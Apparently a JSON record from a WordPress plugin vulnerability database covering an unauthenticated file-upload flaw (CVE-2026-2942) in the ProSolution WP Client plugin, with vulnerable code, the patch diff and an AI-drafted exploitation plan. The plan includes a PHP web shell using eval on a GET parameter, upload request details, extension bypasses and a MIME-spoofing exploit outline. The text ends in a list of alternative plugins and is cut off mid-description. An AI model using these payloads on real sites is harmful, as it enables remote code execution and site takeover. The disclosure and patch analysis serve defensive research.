[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fCDfHvm52cax2v7Sa2TdPpAe4Q0BSLf9lOce1Nr4VOnc":3,"$fIkMqenqHYf6p46HCllhqkxsunC2y7YwsXK9ZiWmxOaI":1647},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":13,"last_updated":14,"tested_up_to":15,"requires_at_least":16,"requires_php":17,"tags":18,"homepage":24,"download_link":25,"security_score":26,"vuln_count":27,"unpatched_count":13,"last_vuln_date":28,"fetched_at":29,"vulnerabilities":30,"developer":66,"crawl_stats":36,"alternatives":69,"analysis":171,"fingerprints":1599},"prosolution-wp-client","ProSolution WP Client","2.0.0","prosolution","https:\u002F\u002Fprofiles.wordpress.org\u002Fprosolution\u002F","\u003Cp>A client for the job portal and online application feature of WorkExpert, the leading webbased ERP software for temporary work busines, produced and maintained by ProSolution (prosolution.com). The plugin only works with WorkExpert software as backend.\u003C\u002Fp>\n\u003Cp>Plain Features list\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Search and Filter Job\u003C\u002Fli>\n\u003Cli>Apply for the job\u003C\u002Fli>\n\u003Cli>Api config and sync data in plugin backend\u003C\u002Fli>\n\u003Cli>Easy setup and automatic shortcode installation\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>One single shortcode handles everything.\u003C\u002Fp>\n\u003Cp>[prosolfrontend ] Shows job searching application view, job list and apply\u003C\u002Fp>\n","Find job and apply , wordpress plugin for prosolution.com jobs (ProSolution WP Client)",30,3419,0,"2026-03-17T08:56:00.000Z","6.9.4","5.9","7.0",[19,20,21,22,23],"application","education","experience","occupation","profession","https:\u002F\u002Fprosolution.com\u002Fprodukte-und-services\u002Fworkexpert.html","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fprosolution-wp-client.2.0.0.zip",94,1,"2026-04-08 05:07:38","2026-04-06T09:54:40.288Z",[31],{"id":32,"url_slug":33,"title":34,"description":35,"plugin_slug":4,"theme_slug":36,"affected_versions":37,"patched_in_version":6,"severity":38,"cvss_score":39,"cvss_vector":40,"vuln_type":41,"published_date":28,"updated_date":42,"references":43,"days_to_patch":27,"patch_diff_files":45,"patch_trac_url":36,"research_status":48,"research_verified":49,"research_rounds_completed":50,"research_plan":51,"research_summary":52,"research_vulnerable_code":53,"research_fix_diff":54,"research_exploit_outline":55,"research_model_used":56,"research_started_at":57,"research_completed_at":58,"research_error":36,"poc_status":59,"poc_video_id":36,"poc_summary":60,"poc_steps":61,"poc_tested_at":62,"poc_wp_version":63,"poc_php_version":64,"poc_playwright_script":36,"poc_exploit_code":36,"poc_has_trace":65,"poc_model_used":36,"poc_verification_depth":36},"CVE-2026-2942","prosolution-wp-client-unauthenticated-arbitrary-file-upload-via-prosolfileuploadprocess","ProSolution WP Client \u003C= 1.9.9 - Unauthenticated Arbitrary File Upload via proSol_fileUploadProcess","The ProSolution WP Client plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'proSol_fileUploadProcess' function in all versions up to, and including, 1.9.9. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.",null,"\u003C=1.9.9","critical",9.8,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:H\u002FA:H","Unrestricted Upload of File with Dangerous Type","2026-04-08 17:25:51",[44],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F3852aef6-42e7-4b71-a1ba-dd41284fd07b?source=api-prod",[46,47],"README.txt","prosolwpclient.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-2942 - ProSolution WP Client Arbitrary File Upload\n\n## 1. Vulnerability Summary\nThe **ProSolution WP Client** plugin (versions \u003C= 1.9.9) contains a critical unrestricted file upload vulnerability in its frontend application handler. The function `proSol_fileUploadProcess` (hooked via AJAX) fails to implement sufficient server-side file type validation. Although version 1.9.3 attempted to add extension checks, the implementation remained flawed or bypassed in subsequent versions up to 1.9.9, allowing unauthenticated attackers to upload executable PHP scripts and achieve Remote Code Execution (RCE).\n\n## 2. Attack Vector Analysis\n* **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n* **AJAX Action:** `proSol_fileUploadProcess`\n* **HTTP Method:** `POST` (Multipart\u002Fform-data)\n* **Vulnerable Parameter:** `file` (or `files[]` depending on the JS uploader implementation)\n* **Authentication:** None required (`wp_ajax_nopriv_` registration).\n* **Preconditions:** The plugin must be active, and a nonce for the `prosol_nonce` action (inferred) is typically required to pass initial security checks.\n\n## 3. Code Flow\n1. **Entry Point:** The plugin registers AJAX handlers for both logged-in and guest users:\n * `add_action('wp_ajax_proSol_fileUploadProcess', 'proSol_fileUploadProcess');`\n * `add_action('wp_ajax_nopriv_proSol_fileUploadProcess', 'proSol_fileUploadProcess');`\n2. **Handler Initiation:** The `proSol_fileUploadProcess` function is called.\n3. **Security Check:** It likely calls `check_ajax_referer('prosol_nonce', 'security')` or `wp_verify_nonce()`.\n4. **Vulnerable Processing:** The function retrieves file data from `$_FILES`.\n5. **Insufficient Validation:** It may check for extensions like `.jpg` or `.pdf` using a blacklist or a weak regex that can be bypassed (e.g., `.php.jpg` or `.phtml`). In some versions, it simply fails to verify the file extension on the server-side entirely, relying on client-side JS validation.\n6. **File Sink:** The file is moved to the uploads directory using `move_uploaded_file()` or `wp_handle_upload()`. If `wp_handle_upload` is used without proper `mimes` filtering, it defaults to allowing dangerous types if the user has specific caps, or if the plugin explicitly overrides the filter.\n\n## 4. Nonce Acquisition Strategy\nThe plugin uses `wp_localize_script` to pass the AJAX URL and a security nonce to the frontend application form generated by the `[prosolfrontend]` shortcode.\n\n* **Shortcode:** `[prosolfrontend]`\n* **Localization Object (Inferred):** `prosol_ajax` or `prosol_frontend_vars`\n* **JS Variable Path:** `window.prosol_ajax?.nonce` or `window.prosol_frontend_vars?.security`\n\n**Acquisition Steps:**\n1. **Create Trigger Page:** Use WP-CLI to create a page containing the required shortcode.\n ```bash\n wp post create --post_type=page --post_title=\"Apply\" --post_status=publish --post_content='[prosolfrontend]'\n ```\n2. **Navigate & Extract:** Use the browser tool to visit the page and extract the nonce.\n * `browser_navigate(\"http:\u002F\u002Flocalhost:8080\u002Fapply\")`\n * `browser_eval(\"prosol_ajax.nonce\")` (Verify the exact object name by inspecting `window` if this fails).\n\n## 5. Exploitation Strategy\n1. **Preparation:** Create a simple PHP web shell: `\u003C?php echo \"VULN_CHECK: \" . (7*7); eval($_GET['cmd']); ?>`.\n2. **Request Construction:**\n * **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n * **Action:** `proSol_fileUploadProcess`\n * **Nonce Parameter:** `security` (or `nonce`, verify in JS source).\n * **File Parameter:** `file`\n3. **HTTP Request (via `http_request`):**\n ```json\n {\n \"method\": \"POST\",\n \"url\": \"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php\",\n \"headers\": {\n \"Content-Type\": \"multipart\u002Fform-data\"\n },\n \"data\": {\n \"action\": \"proSol_fileUploadProcess\",\n \"security\": \"EXTRACTED_NONCE_HERE\",\n \"file\": {\n \"name\": \"exploit.php\",\n \"content\": \"\u003C?php echo 'POC_SUCCESS'; phpinfo(); ?>\",\n \"type\": \"application\u002Fx-php\"\n }\n }\n }\n ```\n4. **Response Analysis:** The plugin usually returns a JSON response containing the URL of the uploaded file or a success message with the path.\n * *Example Success Response:* `{\"success\":true,\"data\":\"http:\u002F\u002Flocalhost:8080\u002Fwp-content\u002Fuploads\u002Fprosolution\u002Fexploit.php\"}`\n\n## 6. Test Data Setup\n1. **Plugin Configuration:**\n * Ensure the plugin is installed and activated: `wp plugin activate prosolution-wp-client`.\n * The plugin might require a dummy API Domain and User to render the frontend correctly (check \"Api Config\" tab settings in `README.txt`).\n2. **Public Page:**\n * `wp post create --post_type=page --post_title=\"Job Application\" --post_status=publish --post_content='[prosolfrontend]'`\n\n## 7. Expected Results\n* The AJAX request should return an HTTP 200 OK.\n* The response body should contain a path or URL to the newly uploaded `exploit.php`.\n* Accessing the file URL (e.g., `\u002Fwp-content\u002Fuploads\u002Fprosolution\u002Fexploit.php`) should execute the PHP code.\n\n## 8. Verification Steps\n1. **File Existence:** Check the filesystem via WP-CLI or container shell.\n ```bash\n find \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fuploads -name \"exploit.php\"\n ```\n2. **Execution Check:** Perform an HTTP GET to the uploaded file.\n ```bash\n http_request --url \"http:\u002F\u002Flocalhost:8080\u002Fwp-content\u002Fuploads\u002Fprosolution\u002Fexploit.php\"\n ```\n Confirm the output contains \"POC_SUCCESS\".\n\n## 9. Alternative Approaches\n* **Bypassing Blacklists:** If the plugin blocks `.php`, try extensions like `.phtml`, `.php7`, `.phps`, or `.inc`.\n* **Filename Manipulation:** If the plugin appends a random string, look for the returned JSON which typically reveals the final filename.\n* **Shortcode Variations:** If `[prosolfrontend]` doesn't load the script, check for other related shortcodes in the plugin source (e.g., `prosol_apply_form`).\n* **Different Upload Sinks:** Check if the plugin uses `wp_ajax_nopriv_proSol_upload_attachment` or similar variations of the upload function name.","The ProSolution WP Client plugin for WordPress is vulnerable to unauthenticated arbitrary file uploads via the `proSol_fileUploadProcess` function. This occurs due to insufficient server-side validation of file extensions and MIME types, allowing attackers to upload executable PHP scripts and achieve remote code execution.","\u002F\u002F public\u002Fclass-prosolwpclient-public.php (v1.9.9)\n\n\t\t\t\u002F\u002Fif the upload dir for prosolwpclient is not created then then create it\n\t\t\t$dir_info = $this->proSol_checkUploadDir();\n\t\t\t$submit_data = $_FILES=\"files\";\n\t\t\t$mime_type = isset( $submit_data['type'] ) ? $submit_data['type'][0] : '';\n\t\t\t$ext = proSol_mimeExt($mime_type);\n\t\t\t\n\t\t\tif ( in_array( $ext, proSol_imageExtArr() ) || in_array( $ext, proSol_documentExtArr() ) ) {\n\t\t\t\tif ( is_array( $dir_info ) && sizeof( $dir_info ) > 0 && array_key_exists( 'folder_exists', $dir_info ) && $dir_info['folder_exists'] == 1 ) {\n\t\t\t\t\t$options = array(\n\t\t\t\t\t\t'script_url' => admin_url( 'admin-ajax.php' ),\n\t\t\t\t\t\t'upload_dir' => $dir_info['prosol_base_dir'],\n\t\t\t\t\t\t'upload_url' => $dir_info['prosol_base_url'],\n\t\t\t\t\t\t'print_response' => false,\n\t\t\t\t\t);\n\t\n\t\t\t\t\t$upload_handler = new CBXProSolWpClient_UploadHandler( $options );\n\t\n\t\t\t\t\t$response_obj = $upload_handler->response['files'][0];\n\t\t\t\t\tif ( $response_obj->name != '' ) {\n\t\t\t\t\t\tif ( ! session_id() ) {\n\t\t\t\t\t\t\tsession_start();\n\t\t\t\t\t\t}\n\t\n\t\t\t\t\t\t$attached_file_name = $response_obj->name;\n\t\n\t\t\t\t\t\t$extension = pathinfo( $attached_file_name, PATHINFO_EXTENSION );\n\t\n\t\t\t\t\t\t$newfilename = wp_create_nonce( session_id() . time() ) . '.' . $extension;\n\t\t\t\t\t\t$rename_status = rename( $dir_info['prosol_base_dir'] . $attached_file_name, $dir_info['prosol_base_dir'] . $newfilename );\n\t\t\t\t\t\t$response_obj->newfilename = $newfilename;\n\t\t\t\t\t\t$response_obj->rename_status = $rename_status;\n\t\t\t\t\t\t$response_obj->extension = $extension;\n\t\n\t\t\t\t\t\t$return_response = array( 'files' => array( 0 => $response_obj ) );\n\t\t\t\t\t\techo json_encode( $return_response );\n\t\t\t\t\t\twp_die();\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprosolution-wp-client\u002F1.9.9\u002Fprosolwpclient.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprosolution-wp-client\u002F2.0.0\u002Fprosolwpclient.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprosolution-wp-client\u002F1.9.9\u002Fprosolwpclient.php\t2026-03-17 08:56:12.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprosolution-wp-client\u002F2.0.0\u002Fprosolwpclient.php\t2026-03-17 08:56:12.000000000 +0000\n@@ -16,7 +16,7 @@\n * Plugin Name: ProSolution WP Client\n * Plugin URI: https:\u002F\u002Fprosolution.com\u002Fprodukte-und-services\u002Fworkexpert.html\n * Description: WordPress client for ProSolution\n- * Version: 1.9.9\n+ * Version: 2.0.0\n * Author: ProSolution\n * Author URI: https:\u002F\u002Fwww.prosolution.com\n * License: GPL-2.0+\n@@ -41,7 +41,7 @@\n \n \n defined('PROSOLWPCLIENT_PLUGIN_NAME') or define('PROSOLWPCLIENT_PLUGIN_NAME', 'prosolwpclient');\n- defined('PROSOLWPCLIENT_PLUGIN_VERSION') or define('PROSOLWPCLIENT_PLUGIN_VERSION', '1.9.9');\n+ defined('PROSOLWPCLIENT_PLUGIN_VERSION') or define('PROSOLWPCLIENT_PLUGIN_VERSION', '2.0.0');\n defined('PROSOLWPCLIENT_BASE_NAME') or define('PROSOLWPCLIENT_BASE_NAME', plugin_basename(__FILE__));\n defined('PROSOLWPCLIENT_ROOT_PATH') or define('PROSOLWPCLIENT_ROOT_PATH', plugin_dir_path(__FILE__));\n defined('PROSOLWPCLIENT_ROOT_URL') or define('PROSOLWPCLIENT_ROOT_URL', plugin_dir_url(__FILE__));\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprosolution-wp-client\u002F1.9.9\u002Fpublic\u002Fclass-prosolwpclient-public.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprosolution-wp-client\u002F2.0.0\u002Fpublic\u002Fclass-prosolwpclient-public.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprosolution-wp-client\u002F1.9.9\u002Fpublic\u002Fclass-prosolwpclient-public.php\t2026-03-17 08:56:12.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fprosolution-wp-client\u002F2.0.0\u002Fpublic\u002Fclass-prosolwpclient-public.php\t2026-03-17 08:56:12.000000000 +0000\n@@ -995,43 +995,117 @@\n \n \t\t\t\u002F\u002Fif the upload dir for prosolwpclient is not created then then create it\n \t\t\t$dir_info = $this->proSol_checkUploadDir();\n-\t\t\t$submit_data = $_FILES[\"files\"];\n-\t\t\t$mime_type = isset( $submit_data['type'] ) ? $submit_data['type'][0] : '';\n-\t\t\t$ext = proSol_mimeExt($mime_type);\n+\t\t\t$submit_data = $_FILES[\"files\"] ?? null;\n+\n+\t\t\t\u002F\u002Fthis is for if someone somehow able to run this function without file\n+\t\t\tif ( ! $submit_data ) {\n+\t\t\t\tdie(__(\"No file uploaded\", \"prosolwpclient\"));\n+\t\t\t}\n+\n+\t\t\t\u002F\u002F get file name and temp file location and sanitize them\n+\t\t\t$org_filename = isset( $submit_data['name'][0] ) ? sanitize_file_name( $submit_data['name'][0] ) : '';\n+\t\t\t$tmp_fileloc = isset( $submit_data['tmp_name'][0] ) ? $submit_data['tmp_name'][0] : '';\n+\n+\t\t\t\u002F\u002F if file name or location empty, process must be aborted\n+\t\t\tif ( empty( $org_filename ) || empty( $tmp_fileloc ) || ! is_uploaded_file( $tmp_fileloc ) ) {\n+\t\t\t\tdie(__(\"Invalid file\", \"prosolwpclient\"));\n+\t\t\t}\n+\t\t\t\u002F\u002Fcheck file extension for uploaded \"up\" file\n+ \t\t$up_fileext = strtolower( pathinfo( $org_filename, PATHINFO_EXTENSION ) );\n+\n+\t\t\t\u002F\u002Fsince most of cv or profile picture are typically using this format, we should whitelist these extension only.\n+\t\t\t\u002F\u002Fdo not use proSol_mimeExt function, it allow all kind of extension including big nono one like php or other programming language.\n+\t\t\t$whitelist_ext = array( 'jpg', 'jpeg', 'png', 'gif', 'webp', 'pdf', 'doc', 'docx' );\n+\n+\t\t\t\u002F\u002Fcheck extension first\n+\t\t\tif ( ! in_array( $up_fileext, $whitelist_ext, true ) ) {\n+\t\t\t\tdie(__(\"File type not allowed\", \"prosolwpclient\"));\n+\t\t\t}\n+\n+\t\t\t\u002F\u002Fcheck for REAL mime type, $submit_data['type'] only check for surface-level.\n+\t\t\t$finfoObj = new finfo( FILEINFO_MIME_TYPE );\n+\t\t\t$true_mmime = $finfoObj->file( $tmp_fileloc );\n+\n+\t\t\t\u002F\u002Fsyntax below is big nono, don't use it to check mime!!!\n+\t\t\t\u002F\u002F$mime_type = isset( $submit_data['type'] ) ? $submit_data['type'][0] : '';\n+\t\t\t\u002F\u002Fagain do not use prosol_mimeext, they will allow script or programming language\n+\t\t\t\u002F\u002F$ext = proSol_mimeExt($mime_type);\n+\n+\t\t\t$wp_mime_chk = wp_check_filetype( $org_filename );\n+\t\t\tif ( $wp_mime_chk['type'] == false ) {\n+\t\t\t\tdie(__(\"File type is not allowed.\", \"prosolwpclient\"));\n+\t\t\t}\n+\n+\t\t\t\u002F\u002Fonly listed mimes type are allow\n+\t\t\t$whitelist_mimes = array(\n+\t\t\t\t'jpg' => 'image\u002Fjpeg',\n+\t\t\t\t'jpeg' => 'image\u002Fjpeg',\n+\t\t\t\t'png' => 'image\u002Fpng',\n+\t\t\t\t'gif' => 'image\u002Fgif',\n+\t\t\t\t'webp' => 'image\u002Fwebp',\n+\t\t\t\t'pdf' => 'application\u002Fpdf',\n+\t\t\t\t'doc' => 'application\u002Fmsword',\n+\t\t\t\t'docx' => 'application\u002Fvnd.openxmlformats-officedocument.wordprocessingml.document',\n+\t\t\t);\n+\n+\t\t\t\u002F\u002Fcheck for real hidden mimes type\n+\t\t\tif ( ! isset( $whitelist_mimes[ $up_fileext ] ) || $true_mmime !== $whitelist_mimes[ $up_fileext ] ) {\n+\t\t\t\tdie(__(\"File content does not match its extension\", \"prosolwpclient\"));\n+\t\t\t}\n+\n+\t\t\tif ( in_array( $up_fileext, array( 'jpg', 'jpeg', 'png', 'gif', 'webp' ), true ) ) {\n+\t\t\t\t\u002F\u002Ffor image upload we can also verified image via dimension size like height and width, fake image file will be false result\n+\t\t\t\t$img_dimension = @getimagesize( $tmp_fileloc );\n+\t\t\t\tif ( $img_dimension === false ) {\n+\t\t\t\t\tdie(__(\"Invalid image dimension\", \"prosolwpclient\"));\n+\t\t\t\t}\n+\t\t\t}\n \t\t\t\n-\t\t\tif ( in_array( $ext, proSol_imageExtArr() ) || in_array( $ext, proSol_documentExtArr() ) ) {\n-\t\t\t\tif ( is_array( $dir_info ) && sizeof( $dir_info ) > 0 && array_key_exists( 'folder_exists', $dir_info ) && $dir_info['folder_exists'] == 1 ) {\n-\t\t\t\t\t$options = array(\n-\t\t\t\t\t\t'script_url' => admin_url( 'admin-ajax.php' ),\n-\t\t\t\t\t\t'upload_dir' => $dir_info['prosol_base_dir'],\n-\t\t\t\t\t\t'upload_url' => $dir_info['prosol_base_url'],\n-\t\t\t\t\t\t'print_response' => false,\n-\t\t\t\t\t);\n-\t\n-\t\t\t\t\t$upload_handler = new CBXProSolWpClient_UploadHandler( $options );\n-\t\n-\t\t\t\t\t$response_obj = $upload_handler->response['files'][0];\n-\t\t\t\t\tif ( $response_obj->name != '' ) {\n-\t\t\t\t\t\tif ( ! session_id() ) {\n-\t\t\t\t\t\t\tsession_start();\n-\t\t\t\t\t\t}\n-\t\n-\t\t\t\t\t\t$attached_file_name = $response_obj->name;\n-\t\n-\t\t\t\t\t\t$extension = pathinfo( $attached_file_name, PATHINFO_EXTENSION );\n-\t\n-\t\t\t\t\t\t$newfilename = wp_create_nonce( session_id() . time() ) . '.' . $extension;\n-\t\t\t\t\t\t$rename_status = rename( $dir_info['prosol_base_dir'] . $attached_file_name, $dir_info['prosol_base_dir'] . $newfilename );\n-\t\t\t\t\t\t$response_obj->newfilename = $newfilename;\n-\t\t\t\t\t\t$response_obj->rename_status = $rename_status;\n-\t\t\t\t\t\t$response_obj->extension = $extension;\n-\t\n-\t\t\t\t\t\t$return_response = array( 'files' => array( 0 => $response_obj ) );\n-\t\t\t\t\t\techo json_encode( $return_response );\n-\t\t\t\t\t\twp_die();\n-\t\t\t\t\t}\n-\t\t\t\t}\n-\t\t\t}\n+\t\t\tif ( is_array( $dir_info ) && sizeof( $dir_info ) > 0 && array_key_exists( 'folder_exists', $dir_info ) && $dir_info['folder_exists'] == 1 ) {\n+\t\t\t\t$options = array(\n+\t\t\t\t\t'script_url' => admin_url( 'admin-ajax.php' ),\n+\t\t\t\t\t'upload_dir' => $dir_info['prosol_base_dir'],\n+\t\t\t\t\t'upload_url' => $dir_info['prosol_base_url'],\n+\t\t\t\t\t'print_response' => false,\n+\t\t\t\t);\n+\t\n+\t\t\t\t$upload_handler = new CBXProSolWpClient_UploadHandler( $options );\n+\t\n+\t\t\t\t$response_obj = $upload_handler->response['files'][0];\n+\n+\t\t\t\t\u002F\u002Fchange $response_obj->name != '' to !empty( $response_obj->name )\n+\t\t\t\tif ( ! empty( $response_obj->name ) ) {\n+\t\t\t\t\tif ( ! session_id() ) {\n+\t\t\t\t\t\tsession_start();\n+\t\t\t\t\t}\n+\t\n+\t\t\t\t\t$attached_file_name = $response_obj->name;\n+\t\n+\t\t\t\t\t\u002F\u002Fcheck final result extension, and make it universal lowercase\n+\t\t\t\t\t$fin_ext = strtolower( pathinfo( $attached_file_name, PATHINFO_EXTENSION ) );\n+\t\t\t\t\t\n+\t\t\t\t\t\u002F\u002Fcheck it one last time on the result\n+\t\t\t\t\tif ( ! in_array( $fin_ext, $whitelist_ext, true ) ) {\n+\t\t\t\t\t\tdie(__(\"File type mismatch after upload\", \"prosolwpclient\"));\n+\t\t\t\t\t}\n+\t\n+\t\t\t\t\t$newfilename = wp_create_nonce( session_id() . time() ) . '.' . $fin_ext;\n+\t\t\t\t\t$rename_status = rename( $dir_info['prosol_base_dir'] . $attached_file_name, $dir_info['prosol_base_dir'] . $newfilename );\n+\t\t\t\t\t$response_obj->newfilename = $newfilename;\n+\t\t\t\t\t$response_obj->rename_status = $rename_status;\n+\t\t\t\t\t$response_obj->extension = $fin_ext;\n+\t\n+\t\t\t\t\t$return_response = array( 'files' => array( 0 => $response_obj ) );\n+\t\t\t\t\t\u002F\u002Fsuccess return\n+\t\t\t\t\techo json_encode( $return_response );\n+\t\t\t\t\twp_die();\n+\t\t\t\t}\n+\t\t\t}\n+\n+\t\t\t\u002F\u002Fdefault return\n+\t\t\twp_send_json_error( array( 'error' => 'Upload failed' ) );\n+\t\t\twp_die();\n+\t\t\t\n \t\t}","1. Access a public page on the target site containing the '[prosolfrontend]' shortcode and extract the 'prosol_nonce' (typically found in the localized script variables). 2. Prepare a multipart\u002Fform-data POST request to \u002Fwp-admin\u002Fadmin-ajax.php. 3. Set the 'action' parameter to 'proSol_fileUploadProcess' and the 'security' parameter to the extracted nonce. 4. Attach a malicious PHP script (e.g., shell.php) in the 'files[]' parameter. 5. To bypass the plugin's weak validation, set the Content-Type of the file part to an allowed image or document MIME type (e.g., 'image\u002Fjpeg'). 6. The plugin will process the upload and return a JSON response containing the newly generated filename in the uploads directory. 7. Execute the uploaded PHP script by visiting its direct URL, typically located at \u002Fwp-content\u002Fuploads\u002Fprosolution\u002F[filename].php.","gemini-3-flash-preview","2026-04-16 16:33:02","2026-04-16 16:34:30","failed","All models in the chain (gemini-3-flash-preview, claude-opus-4-7) failed to produce a verified exploit.",[],"2026-04-17 19:22:57","6.7","8.3",true,{"slug":7,"display_name":7,"profile_url":8,"plugin_count":27,"total_installs":11,"avg_security_score":26,"avg_patch_time_days":27,"trust_score":67,"computed_at":68},96,"2026-04-18T19:25:06.478Z",[70,94,112,133,153],{"slug":71,"name":72,"version":73,"author":74,"author_profile":75,"description":76,"short_description":77,"active_installs":78,"downloaded":79,"rating":80,"num_ratings":81,"last_updated":82,"tested_up_to":15,"requires_at_least":83,"requires_php":84,"tags":85,"homepage":89,"download_link":90,"security_score":91,"vuln_count":27,"unpatched_count":13,"last_vuln_date":92,"fetched_at":93},"resume-builder","Resume Builder","3.3","Justin Scheetz","https:\u002F\u002Fprofiles.wordpress.org\u002Fjustinscheetz\u002F","\u003Cp>Create one or many resumes—complete with contact information, education & experience history, as well as a list of skills—with this incredibly easy-to-use plugin!\u003C\u002Fp>\n\u003Cp>Be sure to check out the \u003Cstrong>\u003Ca href=\"https:\u002F\u002Fresumebuilder.studio\u002F\" rel=\"nofollow ugc\">online demo\u003C\u002Fa>\u003C\u002Fstrong>!\u003C\u002Fp>\n\u003Ch4>Quality design & usability\u003C\u002Fh4>\n\u003Cp>Using the drag & drop resume builder, you can create your resume quickly and without limitations. Add contact information, education, experience, skills and more.\u003C\u002Fp>\n\u003Ch4>Many premium features included\u003C\u002Fh4>\n\u003Cul>\n\u003Cli>A super-intuitive resume builder with drag & drop capabilities.\u003C\u002Fli>\n\u003Cli>A beautiful default resume template.\u003C\u002Fli>\n\u003Cli>The ability to show specific parts of your resume with shortcode options.\u003C\u002Fli>\n\u003Cli>Contact Information\u003C\u002Fli>\n\u003Cli>Experience & Education\u003C\u002Fli>\n\u003Cli>Skills\u003C\u002Fli>\n\u003Cli>Very developer-friendly with loads of hooks & filters.\u003C\u002Fli>\n\u003Cli>And more to come…\u003C\u002Fli>\n\u003C\u002Ful>\n","Create one or many resumes with a photo, contact info, education, experience, skills, and more!",1000,129023,88,17,"2026-03-10T18:00:00.000Z","4.7","7.4",[20,21,86,87,88],"resume","resumes","skills","https:\u002F\u002Fwordpress.org\u002Fplugins\u002Fresume-builder\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fresume-builder.3.3.zip",100,"2023-02-13 00:00:00","2026-04-16T10:56:18.058Z",{"slug":95,"name":96,"version":97,"author":98,"author_profile":99,"description":100,"short_description":101,"active_installs":91,"downloaded":102,"rating":91,"num_ratings":27,"last_updated":103,"tested_up_to":104,"requires_at_least":105,"requires_php":106,"tags":107,"homepage":109,"download_link":110,"security_score":111,"vuln_count":13,"unpatched_count":13,"last_vuln_date":36,"fetched_at":93},"hm-resume-manager","HM Resume Manager","2.4.1","Hossni Mubarak","https:\u002F\u002Fprofiles.wordpress.org\u002Fmhmrajib\u002F","\u003Cp>\u003Ca href=\"https:\u002F\u002Fhmplugin.com\u002Fdemo\u002Fresume-demo\u002F\" rel=\"nofollow ugc\">\u003Cstrong>Live Demo\u003C\u002Fstrong>\u003C\u002Fa> | \u003Ca href=\"https:\u002F\u002Fhmplugin.com\u002Fdemo\u002Fresume-demo\u002F\" rel=\"nofollow ugc\">\u003Cstrong>Live Chat\u003C\u002Fstrong>\u003C\u002Fa> | \u003Ca href=\"https:\u002F\u002Fhmplugin.com\u002Fcontact\u002F\" rel=\"nofollow ugc\">\u003Cstrong>Support\u003C\u002Fstrong>\u003C\u002Fa>\u003C\u002Fp>\n\u003Cspan class=\"embed-youtube\" style=\"text-align:center; display: block;\">\u003Ciframe loading=\"lazy\" class=\"youtube-player\" width=\"750\" height=\"422\" src=\"https:\u002F\u002Fwww.youtube.com\u002Fembed\u002FRO4fParfoAU?version=3&rel=1&showsearch=0&showinfo=1&iv_load_policy=1&fs=1&hl=en-US&autohide=2&wmode=transparent\" allowfullscreen=\"true\" style=\"border:0;\" sandbox=\"allow-scripts allow-same-origin allow-popups allow-presentation allow-popups-to-escape-sandbox\">\u003C\u002Fiframe>\u003C\u002Fspan>\n\u003Ch4>Overview\u003C\u002Fh4>\n\u003Cp>\u003Cstrong>WordPress Resume Manager Plugin\u003C\u002Fstrong> to display and manage personal resume or CV at your WordPress webpage\u003C\u002Fp>\n\u003Cp>You have a domain and you are confused what to do with it? Why not use it as a resume landing page and point people to should a conversation occur surrounding job prospects.\u003C\u002Fp>\n\u003Cp>This plugin creates a resume with personal information, education & experience history, as well as a list of skills with career summary.\u003C\u002Fp>\n\u003Cp>It looks great, is fast and easy to manage.\u003C\u002Fp>\n\u003Cp>\u003Cstrong>🌟 Plugin Features:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Easy to install\u003C\u002Fli>\n\u003Cli>Fully integrated in WordPress\u003C\u002Fli>\n\u003Cli>Easy to use\u003C\u002Fli>\n\u003Cli>Fully Responsive\u003C\u002Fli>\n\u003Cli>Photo Upload option\u003C\u002Fli>\n\u003Cli>Option to change resume background color\u003C\u002Fli>\n\u003Cli>Option to change resume border color\u003C\u002Fli>\n\u003Cli>Option to change skill label text\u003C\u002Fli>\n\u003Cli>Option to change education label text\u003C\u002Fli>\n\u003Cli>Option to change experience label text\u003C\u002Fli>\n\u003Cli>Shortcoded\u003C\u002Fli>\n\u003Cli>Display Skills with progressbar\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>\u003Cstrong>🌟 Resume Included:\u003C\u002Fstrong>\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Personal Profile\u003C\u002Fli>\n\u003Cli>Career Summary\u003C\u002Fli>\n\u003Cli>Contact Information\u003C\u002Fli>\n\u003Cli>Social Network: Twitter & FaceBook\u003C\u002Fli>\n\u003Cli>Skills\u003C\u002Fli>\n\u003Cli>Education Information\u003C\u002Fli>\n\u003Cli>Experience History\u003C\u002Fli>\n\u003C\u002Ful>\n\u003Cp>➡️ Benefits you’ll get by using this plugin:**\u003C\u002Fp>\n\u003Cul>\n\u003Cli>Convert your unused domain into a resume landing page\u003C\u002Fli>\n\u003Cli>Replicated your print resume for the 